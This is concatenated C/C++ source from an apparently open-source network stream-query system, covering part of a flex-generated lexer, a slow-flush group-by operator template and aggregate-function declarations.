	b->yy_ch_buf[0] = YY_END_OF_BUFFER_CHAR;
	b->yy_ch_buf[1] = YY_END_OF_BUFFER_CHAR;

	b->yy_buf_pos = &b->yy_ch_buf[0];

	b->yy_at_bol = 1;
	b->yy_buffer_status = YY_BUFFER_NEW;

	/* Keep the scanner globals in sync if this is the active buffer. */
	if ( b == YY_CURRENT_BUFFER )
		FtaParser_load_buffer_state( );
}
/** Pushes the new state onto the stack. The new state becomes
* the current state. This function will allocate the stack
* if necessary.
* @param new_buffer The new state.
*
*/
void FtaParserpush_buffer_state (YY_BUFFER_STATE new_buffer )
{
    	if (new_buffer == NULL)
		return;

	FtaParserensure_buffer_stack();

	/* This block is copied from FtaParser_switch_to_buffer. */
	if ( YY_CURRENT_BUFFER )
		{
		/* Flush out information for old buffer. */
		*(yy_c_buf_p) = (yy_hold_char);
		YY_CURRENT_BUFFER_LVALUE->yy_buf_pos = (yy_c_buf_p);
		YY_CURRENT_BUFFER_LVALUE->yy_n_chars = (yy_n_chars);
		}

	/* Only push if top exists. Otherwise, replace top. */
	if (YY_CURRENT_BUFFER)
		(yy_buffer_stack_top)++;
	YY_CURRENT_BUFFER_LVALUE = new_buffer;

	/* copied from FtaParser_switch_to_buffer. */
	FtaParser_load_buffer_state( );
	(yy_did_buffer_switch_on_eof) = 1;
}
/** Removes and deletes the top of the stack, if present.
* The next element becomes the new top.
*
*/
void FtaParserpop_buffer_state (void)
{
    	if (!YY_CURRENT_BUFFER)
		return;

	/* Destroy the top buffer and expose the one underneath (if any). */
	FtaParser_delete_buffer(YY_CURRENT_BUFFER );
	YY_CURRENT_BUFFER_LVALUE = NULL;
	if ((yy_buffer_stack_top) > 0)
		--(yy_buffer_stack_top);

	if (YY_CURRENT_BUFFER) {
		FtaParser_load_buffer_state( );
		(yy_did_buffer_switch_on_eof) = 1;
	}
}
/* Allocates the stack if it does not exist.
* Guarantees space for at least one push.
*/
static void FtaParserensure_buffer_stack (void)
{
	yy_size_t num_to_alloc;

	if (!(yy_buffer_stack)) {

		/* First allocation is just for 2 elements, since we don't know if this
		 * scanner will even need a stack. We use 2 instead of 1 to avoid an
		 * immediate realloc on the next call.
         */
		num_to_alloc = 1; /* After all that talk, this was set to 1 anyways... */
		(yy_buffer_stack) = (struct yy_buffer_state**)FtaParseralloc
								(num_to_alloc * sizeof(struct yy_buffer_state*)
								);
		if ( ! (yy_buffer_stack) )
			YY_FATAL_ERROR( "out of dynamic memory in FtaParserensure_buffer_stack()" );

		/* NULL slots mark unused entries. */
		memset((yy_buffer_stack), 0, num_to_alloc * sizeof(struct yy_buffer_state*));

		(yy_buffer_stack_max) = num_to_alloc;
		(yy_buffer_stack_top) = 0;
		return;
	}

	if ((yy_buffer_stack_top) >= ((yy_buffer_stack_max)) - 1){

		/* Increase the buffer to prepare for a possible push. */
		yy_size_t grow_size = 8 /* arbitrary grow size */;

		num_to_alloc = (yy_buffer_stack_max) + grow_size;
		(yy_buffer_stack) = (struct yy_buffer_state**)FtaParserrealloc
								((yy_buffer_stack),
								num_to_alloc * sizeof(struct yy_buffer_state*)
								);
		if ( ! (yy_buffer_stack) )
			YY_FATAL_ERROR( "out of dynamic memory in FtaParserensure_buffer_stack()" );

		/* zero only the new slots.*/
		memset((yy_buffer_stack) + (yy_buffer_stack_max), 0, grow_size * sizeof(struct yy_buffer_state*));
		(yy_buffer_stack_max) = num_to_alloc;
	}
}
/** Setup the input buffer state to scan directly from a user-specified character buffer.
* @param base the character buffer
* @param size the size in bytes of the character buffer
*
* @return the newly allocated buffer state object.
*/
YY_BUFFER_STATE FtaParser_scan_buffer  (char * base, yy_size_t  size )
{
	YY_BUFFER_STATE b;

	/* The caller must have placed the two EOB sentinels at the end of
	 * the buffer; refuse the buffer otherwise. */
	if ( size < 2 ||
	     base[size-2] != YY_END_OF_BUFFER_CHAR ||
	     base[size-1] != YY_END_OF_BUFFER_CHAR )
		/* They forgot to leave room for the EOB's. */
		return 0;

	b = (YY_BUFFER_STATE) FtaParseralloc(sizeof( struct yy_buffer_state )  );
	if ( ! b )
		YY_FATAL_ERROR( "out of dynamic memory in FtaParser_scan_buffer()" );

	b->yy_buf_size = size - 2;	/* "- 2" to take care of EOB's */
	b->yy_buf_pos = b->yy_ch_buf = base;
	b->yy_is_our_buffer = 0;	/* caller owns the memory; never realloc/free it */
	b->yy_input_file = 0;
	b->yy_n_chars = b->yy_buf_size;
	b->yy_is_interactive = 0;
	b->yy_at_bol = 1;
	b->yy_fill_buffer = 0;	/* never try to refill: hitting the end is EOF */
	b->yy_buffer_status = YY_BUFFER_NEW;

	FtaParser_switch_to_buffer(b  );

	return b;
}
/** Setup the input buffer state to scan a string. The next call to FtaParserlex() will
* scan from a @e copy of @a str.
* @param yystr a NUL-terminated string to scan
*
* @return the newly allocated buffer state object.
* @note If you want to scan bytes that may contain NUL values, then use
* FtaParser_scan_bytes() instead.
*/
YY_BUFFER_STATE FtaParser_scan_string (yyconst char * yystr )
{
	/* Convenience wrapper: scan a copy of the NUL-terminated string. */
	return FtaParser_scan_bytes(yystr,strlen(yystr) );
}
/** Setup the input buffer state to scan the given bytes. The next call to FtaParserlex() will
* scan from a @e copy of @a bytes.
* @param yybytes the byte buffer to scan
* @param _yybytes_len the number of bytes in the buffer pointed to by @a bytes.
*
* @return the newly allocated buffer state object.
*/
YY_BUFFER_STATE FtaParser_scan_bytes  (yyconst char * yybytes, yy_size_t  _yybytes_len )
{
	YY_BUFFER_STATE b;
	char *buf;
	yy_size_t n;
	yy_size_t i;

	/* Get memory for full buffer, including space for trailing EOB's. */
	n = _yybytes_len + 2;
	buf = (char *) FtaParseralloc(n  );
	if ( ! buf )
		YY_FATAL_ERROR( "out of dynamic memory in FtaParser_scan_bytes()" );

	/* Copy the caller's bytes; the input may contain NULs, so no strcpy. */
	for ( i = 0; i < _yybytes_len; ++i )
		buf[i] = yybytes[i];

	buf[_yybytes_len] = buf[_yybytes_len+1] = YY_END_OF_BUFFER_CHAR;

	b = FtaParser_scan_buffer(buf,n );
	if ( ! b )
		YY_FATAL_ERROR( "bad buffer in FtaParser_scan_bytes()" );

	/* It's okay to grow etc. this buffer, and we should throw it
	 * away when we're done.
	 */
	b->yy_is_our_buffer = 1;

	return b;
}
#ifndef YY_EXIT_FAILURE
#define YY_EXIT_FAILURE 2
#endif
static void yy_fatal_error (yyconst char* msg )
{
	/* Report an unrecoverable scanner error on stderr and terminate
	 * the process with YY_EXIT_FAILURE. Never returns. */
	fputs( msg, stderr );
	fputc( '\n', stderr );
	exit( YY_EXIT_FAILURE );
}
/* Redefine yyless() so it works in section 3 code. */
/* yyless(n): give back all but the first n characters of the current
 * token. FtaParsertext is re-terminated at length n and scanning will
 * resume at FtaParsertext + n. The first statement restores the byte
 * that was overwritten with NUL when FtaParsertext was set up. */

#undef yyless
#define yyless(n) \
	do \
		{ \
		/* Undo effects of setting up FtaParsertext. */ \
        int yyless_macro_arg = (n); \
        YY_LESS_LINENO(yyless_macro_arg);\
		FtaParsertext[FtaParserleng] = (yy_hold_char); \
		(yy_c_buf_p) = FtaParsertext + yyless_macro_arg; \
		(yy_hold_char) = *(yy_c_buf_p); \
		*(yy_c_buf_p) = '\0'; \
		FtaParserleng = yyless_macro_arg; \
		} \
	while ( 0 )
/* Accessor methods (get/set functions) to struct members. */
/** Get the current line number.
*
*/
int FtaParserget_lineno  (void)
{
	/* Accessor for the scanner's global line-number variable. */
    return FtaParserlineno;
}
/** Get the input stream.
*
*/
FILE *FtaParserget_in  (void)
{
	/* Accessor for the scanner's current input stream. */
        return FtaParserin;
}
/** Get the output stream.
*
*/
FILE *FtaParserget_out  (void)
{
	/* Accessor for the scanner's current output stream (used by ECHO). */
        return FtaParserout;
}
/** Get the length of the current token.
*
*/
yy_size_t FtaParserget_leng  (void)
{
	/* Length of the current token (FtaParsertext). */
        return FtaParserleng;
}
/** Get the current token.
*
*/
char *FtaParserget_text  (void)
{
	/* Pointer to the current token text; valid only until the next match. */
        return FtaParsertext;
}
/** Set the current line number.
* @param _line_number line number
*
*/
void FtaParserset_lineno (int  _line_number )
{
	/* Overwrite the scanner's global line counter. */
    FtaParserlineno = _line_number;
}
/** Set the input stream. This does not discard the current
* input buffer.
* @param _in_str A readable stream.
*
* @see FtaParser_switch_to_buffer
*/
void FtaParserset_in (FILE *  _in_str )
{
	/* Point the scanner at a new input stream; the current buffer is
	 * NOT discarded (see FtaParser_switch_to_buffer for that). */
        FtaParserin = _in_str ;
}
void FtaParserset_out (FILE *  _out_str )
{
	/* Set the stream used by the ECHO default action. */
        FtaParserout = _out_str ;
}
int FtaParserget_debug  (void)
{
	/* Accessor for the flex debug-tracing flag. */
        return FtaParser_flex_debug;
}
void FtaParserset_debug (int  _bdebug )
{
	/* Enable/disable flex debug tracing. */
        FtaParser_flex_debug = _bdebug ;
}
static int yy_init_globals (void)
{
        /* Initialization is the same as for the non-reentrant scanner.
     * This function is called from FtaParserlex_destroy(), so don't allocate here.
     */

	/* Reset the buffer stack and scanner cursors to their pristine
	 * state so a subsequent FtaParserlex() reinitializes itself. */
    (yy_buffer_stack) = 0;
    (yy_buffer_stack_top) = 0;
    (yy_buffer_stack_max) = 0;
    (yy_c_buf_p) = (char *) 0;
    (yy_init) = 0;
    (yy_start) = 0;

/* Defined in main.c */
#ifdef YY_STDINIT
    FtaParserin = stdin;
    FtaParserout = stdout;
#else
    FtaParserin = (FILE *) 0;
    FtaParserout = (FILE *) 0;
#endif

    /* For future reference: Set errno on error, since we are called by
     * FtaParserlex_init()
     */
    return 0;
}
/* FtaParserlex_destroy is for both reentrant and non-reentrant scanners. */
int FtaParserlex_destroy  (void)
{
	/* Release all scanner-owned memory so the process (or a leak
	 * checker) sees no residue; safe to call more than once. */

    /* Pop the buffer stack, destroying each element. */
	while(YY_CURRENT_BUFFER){
		FtaParser_delete_buffer(YY_CURRENT_BUFFER  );
		YY_CURRENT_BUFFER_LVALUE = NULL;
		FtaParserpop_buffer_state();
	}

	/* Destroy the stack itself. */
	FtaParserfree((yy_buffer_stack) );
	(yy_buffer_stack) = NULL;

    /* Reset the globals. This is important in a non-reentrant scanner so the next time
     * FtaParserlex() is called, initialization will occur. */
    yy_init_globals( );

    return 0;
}
/*
* Internal utility routines.
*/
#ifndef yytext_ptr
static void yy_flex_strncpy (char* s1, yyconst char * s2, int n )
{
	/* Copy exactly n bytes from s2 to s1. Unlike strncpy there is no
	 * NUL padding and no terminator appended. */
	int remaining = n;
	while ( remaining-- > 0 )
		*s1++ = *s2++;
}
#endif
#ifdef YY_NEED_STRLEN
static int yy_flex_strlen (yyconst char * s )
{
	/* Portable strlen that returns int, as the flex skeleton expects. */
	const char *end = s;
	while ( *end )
		++end;
	return (int) (end - s);
}
#endif
void *FtaParseralloc (yy_size_t  size )
{
	/* Thin wrapper over malloc so all scanner allocation can be
	 * redirected in one place. Returns NULL on failure. */
	void *region = malloc( size );
	return region;
}
void *FtaParserrealloc  (void * ptr, yy_size_t  size )
{
	/* Wrapper over realloc.
	 *
	 * The (char *) cast accommodates both implementations that use
	 * char* generic pointers and those that use void*: ANSI C and C++
	 * both allow castless assignment from any pointer type to void*
	 * and perform the argument conversion as if by assignment. */
	char *old_region = (char *) ptr;
	return (void *) realloc( old_region, size );
}
void FtaParserfree (void * ptr )
{
	/* Wrapper over free; the char* cast mirrors the convention used
	 * by FtaParserrealloc() (see its comment). Safe on NULL. */
	char *region = (char *) ptr;
	free( region );
}
#define YYTABLES_NAME "yytables"
#line 262 "fta.l"
/* Input callback for the generated scanner (wired in via YY_INPUT).
 * Fills buf with up to max_size bytes from whichever source is active:
 * the in-memory string set by FtaParser_setstringinput(), else the
 * FILE* set by FtaParser_setfileinput(). Returns the byte count, 0 at
 * end of input or when no source has been configured. */
int my_FtaParser_yyinput(char *buf, int max_size){
	int count = 0;

	if(flex_fta_stringinput != NULL){
		while(count < max_size && flex_fta_stringinput[flex_fta_stringinput_ptr] != '\0'){
			buf[count++] = flex_fta_stringinput[flex_fta_stringinput_ptr++];
		}
		return(count);
	}

	if(flex_fta_fileinput != NULL){
		int inchar;
		while(count < max_size && (inchar = getc(flex_fta_fileinput)) != EOF){
			buf[count++] = inchar;
		}
		return(count);
	}

	return(0);
}
/* Direct subsequent lexing to read from FILE f.
 * FtaParserrestart(NULL) resets flex's buffer state; the actual bytes
 * are then pulled through my_FtaParser_yyinput(), which prefers the
 * string source and falls back to the file source. */
void FtaParser_setfileinput(FILE *f){
	FtaParserrestart(NULL);

	flex_fta_fileinput = f;
	flex_fta_stringinput = NULL;	/* disable the competing string source */
	flex_fta_lineno = 1;		/* reset error-reporting position */
	flex_fta_ch = 0;
}
/* Direct subsequent lexing to read from the NUL-terminated string s.
 * s is not copied: the caller must keep it alive while parsing. */
void FtaParser_setstringinput(char *s){
	FtaParserrestart(NULL);

	flex_fta_fileinput = NULL;	/* disable the competing file source */
	flex_fta_stringinput = s;
	flex_fta_stringinput_ptr = 0;	/* read cursor into s */
	flex_fta_lineno = 1;		/* reset error-reporting position */
	flex_fta_ch = 0;
}
<file_sep>/** ------------------------------------------------
Copyright 2014 AT&T Intellectual Property
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
------------------------------------------- */
/* Include guard.
 * BUG FIX: the #define previously created GROUPBY_OPERATOR_H instead of
 * GROUPBY_SLOWFLUSH_OPERATOR_H, so this header was never protected
 * against double inclusion — and the stray macro could suppress the
 * contents of the non-slowflush groupby header if it uses that guard
 * name. The define now matches the #ifndef above and the #endif below. */
#ifndef GROUPBY_SLOWFLUSH_OPERATOR_H
#define GROUPBY_SLOWFLUSH_OPERATOR_H

#include "host_tuple.h"
#include "base_operator.h"
#include <list>
#include "hash_table.h"

/* Marks this build as the slow-flush variant of the groupby operator. */
#define _HFTA_SLOW_FLUSH

using namespace std;
template <class groupby_func, class group, class aggregate, class hasher_func, class equal_func>
class groupby_slowflush_operator : public base_operator {
private :
groupby_func func;
hash_table<group, aggregate, hasher_func, equal_func> group_table[2];
bool flush_finished;
unsigned int curr_table;
typename hash_table<group, aggregate, hasher_func, equal_func>::iterator flush_pos;
int n_patterns;
int gb_per_flush;
public:
groupby_slowflush_operator(int schema_handle, const char* name) : base_operator(name), func(schema_handle) {
flush_finished = true;
curr_table = 0;
flush_pos = group_table[1-curr_table].end();
n_patterns = func.n_groupby_patterns();
gb_per_flush = func.gb_flush_per_tuple();
}
int accept_tuple(host_tuple& tup, list<host_tuple>& result) {
// Push out completed groups
if(!flush_finished) partial_flush(result);
// extract the key information from the tuple and
// copy it into buffer
group grp;
if (!func.create_group(tup, (gs_sp_t)&grp)) {
if(func.disordered()){
// fprintf(stderr,"Out of order record in %s\n",op_name);
return 0;
}
if (func.flush_needed()){
flush_old(result);
}
if (func.temp_status_received()) {
host_tuple temp_tup;
if (!func.create_temp_status_tuple(temp_tup, flush_finished)) {
temp_tup.channel = output_channel;
result.push_back(temp_tup);
}
}
tup.free_tuple();
return 0;
}
if(func.disordered()){
// fprintf(stderr,"Out of order record in %s\n",op_name);
return 0;
}
typename hash_table<group, aggregate, hasher_func, equal_func>::iterator iter;
if ((iter = group_table[curr_table].find(grp)) != group_table[curr_table].end()) {
// Temporal GBvar is part of the group so no flush is needed.
func.update_aggregate(tup, grp, (*iter).second);
}else{
if (func.flush_needed()) {
flush_old(result);
}
if(n_patterns <= 1){
char aggr_buffer[sizeof(aggregate)];
// create an aggregate in preallocated buffer
func.create_aggregate(tup, aggr_buffer);
// neeed operator= doing a deep copy
group_table[curr_table].insert(grp, (*(aggregate*)aggr_buffer));
}else{
int p;
for(p=0;p<n_patterns;++p){
// TODO this code is wrong need to check each pattern to see if its in the table
// need shallow copy constructor for groups
group new_grp(grp, func.get_pattern(p));
char aggr_buffer[sizeof(aggregate)];
func.create_aggregate(tup, aggr_buffer);
// neeed operator= doing a deep copy
group_table[curr_table].insert(new_grp, (*(aggregate*)aggr_buffer));
}
}
}
tup.free_tuple();
return 0;
}
int partial_flush(list<host_tuple>& result) {
host_tuple tup;
unsigned int old_table = 1-curr_table;
unsigned int i;
// emit up to _GB_FLUSH_PER_TABLE_ output tuples.
if (!group_table[old_table].empty()) {
for (i=0; flush_pos != group_table[old_table].end() && i<gb_per_flush; ++flush_pos, ++i) {
bool failed = false;
tup = func.create_output_tuple((*flush_pos).first,(*flush_pos).second, failed);
if (!failed) {
tup.channel = output_channel;
result.push_back(tup);
}
// free((*flush_pos).second);
}
}
// Finalize processing if empty.
if(flush_pos == group_table[old_table].end()) {
flush_finished = true;
group_table[old_table].clear();
group_table[old_table].resize();
}
return 0;
}
int flush(list<host_tuple>& result) {
host_tuple tup;
typename hash_table<group, aggregate, hasher_func, equal_func>::iterator iter;
unsigned int old_table = 1-curr_table;
// If the old table isn't empty, flush it now.
if (!group_table[old_table].empty()) {
for (; flush_pos != group_table[old_table].end(); ++flush_pos) {
bool failed = false;
tup = func.create_output_tuple((*flush_pos).first,(*flush_pos).second, failed);
if (!failed) {
tup.channel = output_channel;
result.push_back(tup);
}
// free((*flush_pos).second);
}
group_table[old_table].clear();
group_table[old_table].resize();
}
flush_pos = group_table[curr_table].begin();
// If the table isn't empty, flush it now.
if (!group_table[curr_table].empty()) {
for (; flush_pos != group_table[curr_table].end(); ++flush_pos) {
bool failed = false;
tup = func.create_output_tuple((*flush_pos).first,(*flush_pos).second, failed);
if (!failed) {
tup.channel = output_channel;
result.push_back(tup);
}
// free((*flush_pos).second);
}
group_table[curr_table].clear();
}
flush_finished = true;
return 0;
}
// Finish flushing the old table, then swap tables and arm a new
// partial flush of the table being retired.
// Remaining groups in the old table are emitted via
// func.create_output_tuple (failed tuples are dropped) and the old
// table is cleared.  flush_pos is then left pointing at the start of
// the current table — which becomes the new "old" table — so that
// subsequent partial-flush calls can drain it incrementally.
// flush_finished is reset to false.  Always returns 0.
int flush_old(list<host_tuple>& result) {
	host_tuple tup;
	unsigned int old_table = 1-curr_table;
	// Emit any groups still left in the old table, resuming at flush_pos.
	if (!group_table[old_table].empty()) {
		for (; flush_pos != group_table[old_table].end(); ++flush_pos) {
			bool failed = false;
			tup = func.create_output_tuple((*flush_pos).first,(*flush_pos).second, failed);
			if (!failed) {
				tup.channel = output_channel;
				result.push_back(tup);
			}
		}
	}
	group_table[old_table].clear();
	group_table[old_table].resize();
	// Swap tables and enable incremental (partial) flush processing
	// of the table we are retiring.
	flush_pos = group_table[curr_table].begin();
	curr_table = old_table;
	flush_finished = false;
	return 0;
}
// Forward an updated query parameter block to the aggregation
// functor.  Always returns 0.
int set_param_block(int sz, void * value) {
func.set_param_block(sz, value);
return 0;
}
// Build a temporary-status tuple on this operator's output channel.
// flush_finished tells the functor whether the in-progress flush has
// completed.  Returns the functor's status code.
int get_temp_status(host_tuple& result) {
result.channel = output_channel;
return func.create_temp_status_tuple(result, flush_finished);
}
// This operator never reports a blocked output; always returns -1.
int get_blocked_status () {
return -1;
}
// Report the memory consumed by the group-by state: the combined
// footprint of both hash tables.
unsigned int get_mem_footprint() {
	unsigned int total = group_table[0].get_mem_footprint();
	total += group_table[1].get_mem_footprint();
	return total;
}
};
#endif // GROUPBY_OPERATOR_H
<file_sep>/* ------------------------------------------------
Copyright 2014 AT&T Intellectual Property
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
------------------------------------------- */
#ifndef _HFTA_UDAF_H_INCLUDED_
#define _HFTA_UDAF_H_INCLUDED_
#include "vstring.h"
#include "host_tuple.h"
#include "gsconfig.h"
// -------------------------------------------------------------------
// sum over 3 intervals : test rUDAF
void sum3_HFTA_AGGR_INIT_(gs_sp_t buf) ;
void sum3_HFTA_AGGR_UPDATE_(gs_sp_t buf, gs_uint32_t s) ;
void sum3_HFTA_AGGR_OUTPUT_(gs_uint32_t *result, gs_sp_t buf) ;
void sum3_HFTA_AGGR_DESTROY_(gs_sp_t buf) ;
void sum3_HFTA_AGGR_REINIT_( gs_sp_t buf) ;
// -------------------------------------------------------------------
// running sum over arbitrary intervals.
void moving_sum_udaf_HFTA_AGGR_INIT_(gs_sp_t buf) ;
void moving_sum_udaf_HFTA_AGGR_UPDATE_(gs_sp_t buf, gs_uint32_t s, gs_uint32_t N) ;
void moving_sum_udaf_HFTA_AGGR_OUTPUT_(gs_uint64_t *result, gs_sp_t buf) ;
void moving_sum_udaf_HFTA_AGGR_DESTROY_(gs_sp_t buf) ;
void moving_sum_udaf_HFTA_AGGR_REINIT_( gs_sp_t buf) ;
#define super_moving_sum_udaf_HFTA_AGGR_INIT_ moving_sum_udaf_HFTA_AGGR_INIT_
void super_moving_sum_udaf_HFTA_AGGR_UPDATE_(gs_sp_t buf, gs_uint64_t s) ;
#define super_moving_sum_udaf_HFTA_AGGR_OUTPUT_ moving_sum_udaf_HFTA_AGGR_OUTPUT_
#define super_moving_sum_udaf_HFTA_AGGR_DESTROY_ moving_sum_udaf_HFTA_AGGR_DESTROY_
#define super_moving_sum_udaf_HFTA_AGGR_REINIT_ moving_sum_udaf_HFTA_AGGR_REINIT_
gs_uint32_t moving_sum_extract(gs_uint64_t result);
gs_float_t moving_sum_extract_exp(gs_uint64_t result, gs_float_t alpha);
/////////////////////////////////////////////////////////////////////////
///// Calculate the average of all positive float numbers
void POSAVG_HFTA_AGGR_INIT_(gs_sp_t buf);
void POSAVG_HFTA_AGGR_UPDATE_(gs_sp_t buf, gs_float_t v);
void POSAVG_HFTA_AGGR_OUTPUT_(gs_float_t * v, gs_sp_t buf);
void POSAVG_HFTA_AGGR_DESTROY_(gs_sp_t buf);
///////////////////////////////////////////////////////////////////
///// avg_udaf (simple example)
// hfta avg_udaf
void avg_udaf_HFTA_AGGR_INIT_(gs_sp_t b);
void avg_udaf_HFTA_AGGR_UPDATE_(gs_sp_t b, gs_uint32_t v);
void avg_udaf_HFTA_AGGR_OUTPUT_(vstring *r,gs_sp_t b);
void avg_udaf_HFTA_AGGR_DESTROY_(gs_sp_t b);
// avg_udaf superaggregate
void avg_udaf_hfta_HFTA_AGGR_INIT_(gs_sp_t b);
void avg_udaf_hfta_HFTA_AGGR_UPDATE_(gs_sp_t b, vstring *v);
void avg_udaf_hfta_HFTA_AGGR_OUTPUT_(vstring *r,gs_sp_t b);
void avg_udaf_hfta_HFTA_AGGR_DESTROY_(gs_sp_t b);
// Extraction function
gs_float_t extr_avg_fcn(vstring *v);
// first aggregate
// hfta only
void FIRST_HFTA_AGGR_INIT_(gs_uint32_t* scratch);
void FIRST_HFTA_AGGR_REINIT_(gs_uint32_t* scratch);
void FIRST_HFTA_AGGR_UPDATE_(gs_uint32_t* scratch, gs_uint32_t val);
void FIRST_HFTA_AGGR_OUTPUT_(gs_uint32_t* res, gs_uint32_t* scratch);
void FIRST_HFTA_AGGR_DESTROY_(gs_uint32_t* scratch);
void FIRST_HFTA_AGGR_INIT_(gs_int32_t* scratch);
void FIRST_HFTA_AGGR_REINIT_(gs_int32_t* scratch);
void FIRST_HFTA_AGGR_UPDATE_(gs_int32_t* scratch, gs_int32_t val);
void FIRST_HFTA_AGGR_OUTPUT_(gs_int32_t* res, gs_int32_t* scratch);
void FIRST_HFTA_AGGR_DESTROY_(gs_int32_t* scratch);
void FIRST_HFTA_AGGR_INIT_(gs_uint64_t* scratch);
void FIRST_HFTA_AGGR_REINIT_(gs_uint64_t* scratch);
void FIRST_HFTA_AGGR_UPDATE_(gs_uint64_t* scratch, gs_uint64_t val);
void FIRST_HFTA_AGGR_OUTPUT_(gs_uint64_t* res, gs_uint64_t* scratch);
void FIRST_HFTA_AGGR_DESTROY_(gs_uint64_t* scratch);
void FIRST_HFTA_AGGR_INIT_(gs_int64_t* scratch);
void FIRST_HFTA_AGGR_REINIT_(gs_int64_t* scratch);
void FIRST_HFTA_AGGR_UPDATE_(gs_int64_t* scratch, gs_int64_t val);
void FIRST_HFTA_AGGR_OUTPUT_(gs_int64_t* res, gs_int64_t* scratch);
void FIRST_HFTA_AGGR_DESTROY_(gs_int64_t* scratch);
void FIRST_HFTA_AGGR_INIT_(vstring* scratch);
void FIRST_HFTA_AGGR_REINIT_(vstring* scratch);
void FIRST_HFTA_AGGR_UPDATE_(vstring* scratch, vstring* val);
void FIRST_HFTA_AGGR_OUTPUT_(vstring* res, vstring* scratch);
void FIRST_HFTA_AGGR_DESTROY_(vstring* scratch);
// hfta-lfta split
void FIRST_hfta_HFTA_AGGR_INIT_(gs_uint32_t* scratch);
void FIRST_hfta_HFTA_AGGR_REINIT_(gs_uint32_t* scratch);
void FIRST_hfta_HFTA_AGGR_UPDATE_(gs_uint32_t* scratch, gs_uint32_t val);
void FIRST_hfta_HFTA_AGGR_OUTPUT_(gs_uint32_t* res, gs_uint32_t* scratch);
void FIRST_hfta_HFTA_AGGR_DESTROY_(gs_uint32_t* scratch);
void FIRST_INT_hfta_HFTA_AGGR_INIT_(gs_int32_t* scratch);
void FIRST_INT_hfta_HFTA_AGGR_REINIT_(gs_int32_t* scratch);
void FIRST_INT_hfta_HFTA_AGGR_UPDATE_(gs_int32_t* scratch, gs_int32_t val);
void FIRST_INT_hfta_HFTA_AGGR_OUTPUT_(gs_int32_t* res, gs_int32_t* scratch);
void FIRST_INT_hfta_HFTA_AGGR_DESTROY_(gs_int32_t* scratch);
void FIRST_ULL_hfta_HFTA_AGGR_INIT_(gs_uint64_t* scratch);
void FIRST_ULL_hfta_HFTA_AGGR_REINIT_(gs_uint64_t* scratch);
void FIRST_ULL_hfta_HFTA_AGGR_UPDATE_(gs_uint64_t* scratch, gs_uint64_t val);
void FIRST_ULL_hfta_HFTA_AGGR_OUTPUT_(gs_uint64_t* res, gs_uint64_t* scratch);
void FIRST_ULL_hfta_HFTA_AGGR_DESTROY_(gs_uint64_t* scratch);
void FIRST_LL_hfta_HFTA_AGGR_INIT_(gs_int64_t* scratch);
void FIRST_LL_hfta_HFTA_AGGR_REINIT_(gs_int64_t* scratch);
void FIRST_LL_hfta_HFTA_AGGR_UPDATE_(gs_int64_t* scratch, gs_int64_t val);
void FIRST_LL_hfta_HFTA_AGGR_OUTPUT_(gs_int64_t* res, gs_int64_t* scratch);
void FIRST_LL_hfta_HFTA_AGGR_DESTROY_(gs_int64_t* scratch);
void FIRST_STR_hfta_HFTA_AGGR_INIT_(vstring* scratch);
void FIRST_STR_hfta_HFTA_AGGR_REINIT_(vstring* scratch);
void FIRST_STR_hfta_HFTA_AGGR_UPDATE_(vstring* scratch, vstring* val);
void FIRST_STR_hfta_HFTA_AGGR_OUTPUT_(vstring* res, vstring* scratch);
void FIRST_STR_hfta_HFTA_AGGR_DESTROY_(vstring* scratch);
// last aggregate
// hfta only
void LAST_HFTA_AGGR_INIT_(gs_uint32_t* scratch);
void LAST_HFTA_AGGR_REINIT_(gs_uint32_t* scratch);
void LAST_HFTA_AGGR_UPDATE_(gs_uint32_t* scratch, gs_uint32_t val);
void LAST_HFTA_AGGR_OUTPUT_(gs_uint32_t* res, gs_uint32_t* scratch);
void LAST_HFTA_AGGR_DESTROY_(gs_uint32_t* scratch);
void LAST_HFTA_AGGR_INIT_(gs_int32_t* scratch);
void LAST_HFTA_AGGR_REINIT_(gs_int32_t* scratch);
void LAST_HFTA_AGGR_UPDATE_(gs_int32_t* scratch, gs_int32_t val);
void LAST_HFTA_AGGR_OUTPUT_(gs_int32_t* res, gs_int32_t* scratch);
void LAST_HFTA_AGGR_DESTROY_(gs_int32_t* scratch);
void LAST_HFTA_AGGR_INIT_(gs_uint64_t* scratch);
void LAST_HFTA_AGGR_REINIT_(gs_uint64_t* scratch);
void LAST_HFTA_AGGR_UPDATE_(gs_uint64_t* scratch, gs_uint64_t val);
void LAST_HFTA_AGGR_OUTPUT_(gs_uint64_t* res, gs_uint64_t* scratch);
void LAST_HFTA_AGGR_DESTROY_(gs_uint64_t* scratch);
void LAST_HFTA_AGGR_INIT_(gs_int64_t* scratch);
void LAST_HFTA_AGGR_REINIT_(gs_int64_t* scratch);
void LAST_HFTA_AGGR_UPDATE_(gs_int64_t* scratch, gs_int64_t val);
void LAST_HFTA_AGGR_OUTPUT_(gs_int64_t* res, gs_int64_t* scratch);
void LAST_HFTA_AGGR_DESTROY_(gs_int64_t* scratch);
void LAST_HFTA_AGGR_INIT_(vstring* scratch);
void LAST_HFTA_AGGR_REINIT_(vstring* scratch);
void LAST_HFTA_AGGR_UPDATE_(vstring* scratch, vstring* val);
void LAST_HFTA_AGGR_OUTPUT_(vstring* res, vstring* scratch);
void LAST_HFTA_AGGR_DESTROY_(vstring* scratch);
// hfta/lfta split
void LAST_hfta_HFTA_AGGR_INIT_(gs_uint32_t* scratch);
void LAST_hfta_HFTA_AGGR_REINIT_(gs_uint32_t* scratch);
void LAST_hfta_HFTA_AGGR_UPDATE_(gs_uint32_t* scratch, gs_uint32_t val);
void LAST_hfta_HFTA_AGGR_OUTPUT_(gs_uint32_t* res, gs_uint32_t* scratch);
void LAST_hfta_HFTA_AGGR_DESTROY_(gs_uint32_t* scratch);
void LAST_INT_hfta_HFTA_AGGR_INIT_(gs_int32_t* scratch);
void LAST_INT_hfta_HFTA_AGGR_REINIT_(gs_int32_t* scratch);
